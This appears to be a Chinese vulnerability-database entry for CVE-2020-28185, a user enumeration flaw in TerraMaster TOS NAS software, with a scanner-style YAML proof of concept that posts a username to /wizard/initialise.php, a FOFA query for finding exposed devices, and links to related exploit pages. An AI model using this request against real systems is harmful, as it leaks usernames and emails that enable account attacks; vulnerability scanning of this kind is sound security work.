CVE-2020-28185: TerraMaster TOS 用户枚举漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2020-28185

info:
  name: TerraMaster TOS 用户枚举漏洞
  author: zan8in
  severity: medium
  description: |
    TerraMaster TOS 存在用户枚举漏洞，通过wizard/initialise.php页面的username参数即可枚举系统中的用户，以及泄露邮箱信息
    fofa: "TerraMaster" && header="TOS"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/TerraMaster/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.html
rules:
  r0:
    request:
      method: POST
      path: /wizard/initialise.php
      body: tab=checkuser&username=admin
    expression: |
      response.status == 200 && response.body.bcontains(b'{"username":"admin","email":"') && response.body.bcontains(b'"status":1')
expression: r0() 

相关漏洞推荐

• CVE-2020-15568: TerraMaster TOS v4.1.24 RCE POC

  2025-09-01 | TerraMaster TOS
  TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. T...

• CVE-2020-28187: TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187 POC

  2025-09-01 | TerraMaster TOS
  TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /in...

• CVE-2022-24990: TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990 POC

  2025-09-01 | TerraMaster TOS
  TerraMaster TOS 存在信息泄漏漏洞，攻击者通过漏洞可以获取服务器上的敏感信息，配合 CVE-2022-24989漏洞可以获取服务器权限 TerraMaster TOS < 4.2....

• CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

  2025-09-01 | Nexus Repository
  漏洞触发需要任意账户权限 body="Nexus Repository Manager" app="Nexus-Repository-Manager"

• CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC

  2025-09-01 | LimeSurvey
  LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/a...